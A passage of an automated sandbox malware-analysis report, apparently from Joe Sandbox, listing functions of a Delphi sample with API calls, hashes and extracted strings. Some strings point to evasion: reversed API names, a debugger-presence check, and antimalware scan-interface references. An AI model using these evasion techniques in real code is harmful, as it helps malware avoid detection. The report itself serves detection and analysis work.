                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                            • String ID:
                                                                            • API String ID: 185507032-0
                                                                            • Opcode ID: 161f23f949ca86600fdaadd8a970366d4eb2c80bf813d9febcf098cb85b0c5eb
                                                                            • Instruction ID: d640e503db1199476f3c2518be41fea464c3c93b333b430fc35c1faae97f6b88
                                                                            • Opcode Fuzzy Hash: 161f23f949ca86600fdaadd8a970366d4eb2c80bf813d9febcf098cb85b0c5eb
                                                                            • Instruction Fuzzy Hash: 561170BE548345BED200FBA8CC81F9B77EDAF44700F804A16B744D60D4EA74E9048B63
                                                                            Function 0288E58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0288E625
                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0288E641
                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0288E67A
                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0288E6F7
                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0288E710
                                                                            • VariantCopy.OLEAUT32(?,00000000), ref: 0288E745
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                            • String ID:
                                                                            • API String ID: 351091851-0
                                                                            • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                            • Instruction ID: 7a8df0b67248fe54830233aa1dbdb91f3e93afbc2a68825b3dcfde2466a72b46
                                                                            • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                            • Instruction Fuzzy Hash: 2051D97D9016299BCB26EB98C890BD9B3BDAF49310F0045D5F609E7211DB30AF858F62
                                                                            Function 02883598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028835BA
                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02883609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028835ED
                                                                            • RegCloseKey.ADVAPI32(?,02883610,00000000,?,00000004,00000000,02883609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02883603
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                            • API String ID: 3677997916-4173385793
                                                                            • Opcode ID: 44efcdb4152991a93bcbd57d5ee2fe348e5679478fe688f479f8b1438eb7c2c6
                                                                            • Instruction ID: 7150eff202641003fef1caeafb084d8625238f88fd09d167b11ae769ca4666f2
                                                                            • Opcode Fuzzy Hash: 44efcdb4152991a93bcbd57d5ee2fe348e5679478fe688f479f8b1438eb7c2c6
                                                                            • Instruction Fuzzy Hash: 2F01757D950218BAFB11EBD49D42BBD77ECE708B10F1009A1BA04D6680EB74A510DA5A
                                                                            Function 02898274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                            • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                            • GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: Kernel32$sserddAcorPteG
                                                                            • API String ID: 667068680-1372893251
                                                                            • Opcode ID: 5a3d710612b3a96a27b986baf8d37f2d01831cbc675eac8b470eca0c81e3dca7
                                                                            • Instruction ID: 7af2f173e872da4985c8c71501742b82d70ff9ffee849f1472b99a40463bc441
                                                                            • Opcode Fuzzy Hash: 5a3d710612b3a96a27b986baf8d37f2d01831cbc675eac8b470eca0c81e3dca7
                                                                            • Instruction Fuzzy Hash: CC014F7D644309AFEB04FBE8EC81A9EB7EEEB49B10F558460A800D7644E674B900CA25
                                                                            Function 0288AA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(?,00000000,0288AAE7,?,?,00000000), ref: 0288AA68
                                                                              • Part of subcall function 0288A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0288A7E2
                                                                            • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0288AAE7,?,?,00000000), ref: 0288AA98
                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 0288AAA3
                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0288AAE7,?,?,00000000), ref: 0288AAC1
                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 0288AACC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Locale$InfoThread$CalendarEnum
                                                                            • String ID:
                                                                            • API String ID: 4102113445-0
                                                                            • Opcode ID: a26ab34030ba2f3f9e5a4196a65f430a67e9f1ae8e5f7320120bb0ea74a076cd
                                                                            • Instruction ID: 28420439c1148ca829847bfeb3a07d01af881162271943a8b9c80644387594e4
                                                                            • Opcode Fuzzy Hash: a26ab34030ba2f3f9e5a4196a65f430a67e9f1ae8e5f7320120bb0ea74a076cd
                                                                            • Instruction Fuzzy Hash: D201F2BD2002846FF715FA6CCD11B6F739DDB81710F510162E500E6AC1E6799E108A66
                                                                            Function 0288AB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(?,00000000,0288ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0288AB2F
                                                                              • Part of subcall function 0288A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0288A7E2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Locale$InfoThread
                                                                            • String ID: eeee$ggg$yyyy
                                                                            • API String ID: 4232894706-1253427255
                                                                            • Opcode ID: 53623aeb6759a9069556ddd9448423a487847df6f83fdd3b1f2e7637eaa1babd
                                                                            • Instruction ID: 5669379917e156043cafb08452c0ae6f41d342ec408248cad633747dd21c4c16
                                                                            • Opcode Fuzzy Hash: 53623aeb6759a9069556ddd9448423a487847df6f83fdd3b1f2e7637eaa1babd
                                                                            • Instruction Fuzzy Hash: 3641B17D7041094BF719FA7CC9806BEB3EBDB85204B544527D652C33C4EAB8ED06CA66
                                                                            Function 02897E50 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • RtlMoveMemory.NTDLL(?,?,?), ref: 02897ED7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$MemoryMove
                                                                            • String ID: Ntdll$RtlM$oveM
                                                                            • API String ID: 2705147948-1610840992
                                                                            • Opcode ID: f3af39564556aef63df3d03e0f2eee1031d9dbe5a7d9d089d644ddfe68b44102
                                                                            • Instruction ID: 727faa2ebce54edd76afbd511bed5a1b4893e061d8ef4aef1e8f8e5d8105a49c
                                                                            • Opcode Fuzzy Hash: f3af39564556aef63df3d03e0f2eee1031d9dbe5a7d9d089d644ddfe68b44102
                                                                            • Instruction Fuzzy Hash: A50171BD694249BFFF00EB98EC42F6AB7D9EB09B10F544490B901E6A40D678B9108A25
                                                                            Function 028981CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc
                                                                            • String ID: AeldnaHeludoMteG$KernelBASE
                                                                            • API String ID: 1883125708-1952140341
                                                                            • Opcode ID: 252120c665774b2647abc783204641a5e1481498554e7edff8a06980958eb0e5
                                                                            • Instruction ID: e388bf73cc9214b3ff55f40ac1e33931976b9bae52586da94bd6ca89db82c5bd
                                                                            • Opcode Fuzzy Hash: 252120c665774b2647abc783204641a5e1481498554e7edff8a06980958eb0e5
                                                                            • Instruction Fuzzy Hash: 72F0627DA44745AFEB10FBE8EC419A9B7EDE74AB10B514461B800C3710E674AE10C926
                                                                            Function 0289F6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KernelBase,?,0289FAEB,UacInitialize,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,ScanString,02907380,028AB7B8,Initialize), ref: 0289F6EE
                                                                            • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0289F700
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: IsDebuggerPresent$KernelBase
                                                                            • API String ID: 1646373207-2367923768
                                                                            • Opcode ID: 968a7f31187042b72ddbec254ef61f049e4294f6df8c5b809e0430428114011a
                                                                            • Instruction ID: 7f5b09a4d06e1f47df8c6ac0a9497c1d220f31d138382cd0b36c77059e900b25
                                                                            • Opcode Fuzzy Hash: 968a7f31187042b72ddbec254ef61f049e4294f6df8c5b809e0430428114011a
                                                                            • Instruction Fuzzy Hash: FBD012BD3603E039BE04B2F82CC481D038C897452D3280E20B226C6593F6AB88155015
                                                                            Function 0288C474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,028AD10B,00000000,028AD11E), ref: 0288C47A
                                                                            • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0288C48B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                            • API String ID: 1646373207-3712701948
                                                                            • Opcode ID: e8ed7e4bbb747dd7b5288f8706aa257a240a013dc576f1587ea6e3574fa4d170
                                                                            • Instruction ID: 5e202d2ffdbfe20a9c52df2efcccb90731fb4f3ad70aca0fff711c4b91efb8db
                                                                            • Opcode Fuzzy Hash: e8ed7e4bbb747dd7b5288f8706aa257a240a013dc576f1587ea6e3574fa4d170
                                                                            • Instruction Fuzzy Hash: 29D05EECA403549EF744BAB5548063126988708311B10CC36E401D5246EBA658948F29
                                                                            Function 0288E1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0288E297
                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0288E2B3
                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0288E32A
                                                                            • VariantClear.OLEAUT32(?), ref: 0288E353
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                            • String ID:
                                                                            • API String ID: 920484758-0
                                                                            • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                            • Instruction ID: b4459c64975e3e11b48ad6e34ca831c587db4d99df3ce67ebe0885a890c2ec24
                                                                            • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                            • Instruction Fuzzy Hash: CB41E77DA012299BCB62EB99C890BD9B3BDAB49314F0445D5F548E7211DB30AF808F52
                                                                            Function 0288AD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0288AD59
                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0288AD7D
                                                                            • GetModuleFileNameA.KERNEL32(02880000,?,00000105), ref: 0288AD98
                                                                            • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0288AE2E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                            • String ID:
                                                                            • API String ID: 3990497365-0
                                                                            • Opcode ID: 2c869e78a4378ccf1538a9a13555ec8dcf172435802cf037fbf6fec79dce38cb
                                                                            • Instruction ID: a90a6d0972cdb66384ef3f4715d4343e0af769f20204fbf2f96fea0302d479f7
                                                                            • Opcode Fuzzy Hash: 2c869e78a4378ccf1538a9a13555ec8dcf172435802cf037fbf6fec79dce38cb
                                                                            • Instruction Fuzzy Hash: A2413D7DA4025C9FDB21EB68CC84BDAB7FDAB08300F4405E6A648E7241E774AF848F51
                                                                            Function 0288AD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0288AD59
                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0288AD7D
                                                                            • GetModuleFileNameA.KERNEL32(02880000,?,00000105), ref: 0288AD98
                                                                            • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0288AE2E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                            • String ID:
                                                                            • API String ID: 3990497365-0
                                                                            • Opcode ID: ab68c23db2d27ed4d2ad4e3c62598aec2930df35339fec588cf304784b6dbcea
                                                                            • Instruction ID: 3726c1c618e4fab46beaeaa67babac23e24e4738a2a0d556c351758da158f9d9
                                                                            • Opcode Fuzzy Hash: ab68c23db2d27ed4d2ad4e3c62598aec2930df35339fec588cf304784b6dbcea
                                                                            • Instruction Fuzzy Hash: 69414E7DA4025C9FDB21EB68CC84BDAB7FDAB08300F4405E6A648E7241E774AF848F51
                                                                            Function 02881C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c1b0241664fac4f79b4aa5faa6f9882c8613858ff254f6e1791c2eac180c34db
                                                                            • Instruction ID: 5c5f7362434ff5bf8aef853017c7b6e8b210cc4b2ab55d34e683f7da31622c55
                                                                            • Opcode Fuzzy Hash: c1b0241664fac4f79b4aa5faa6f9882c8613858ff254f6e1791c2eac180c34db
                                                                            • Instruction Fuzzy Hash: FDA103AE7106040BD718BA7C9D883BDB3C69BC4325F18827EE21DCB785EF68D9538651
                                                                            Function 028894EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,028895DA), ref: 02889572
                                                                            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,028895DA), ref: 02889578
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: DateFormatLocaleThread
                                                                            • String ID: yyyy
                                                                            • API String ID: 3303714858-3145165042
                                                                            • Opcode ID: 13ffb8f90c2236e20c277624fc3eb6a8990424fa65aacd3bfe64ffc1c471e22c
                                                                            • Instruction ID: c0403473193cde451c9e85a47d8e8307c606f63b0a5de15c5913ea765a7001a2
                                                                            • Opcode Fuzzy Hash: 13ffb8f90c2236e20c277624fc3eb6a8990424fa65aacd3bfe64ffc1c471e22c
                                                                            • Instruction Fuzzy Hash: BE215C7DA002589FDB10EFA8C981ABEB3F9EF09700F5140A5E909E7351E7309E40CB66
                                                                            Function 02898338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
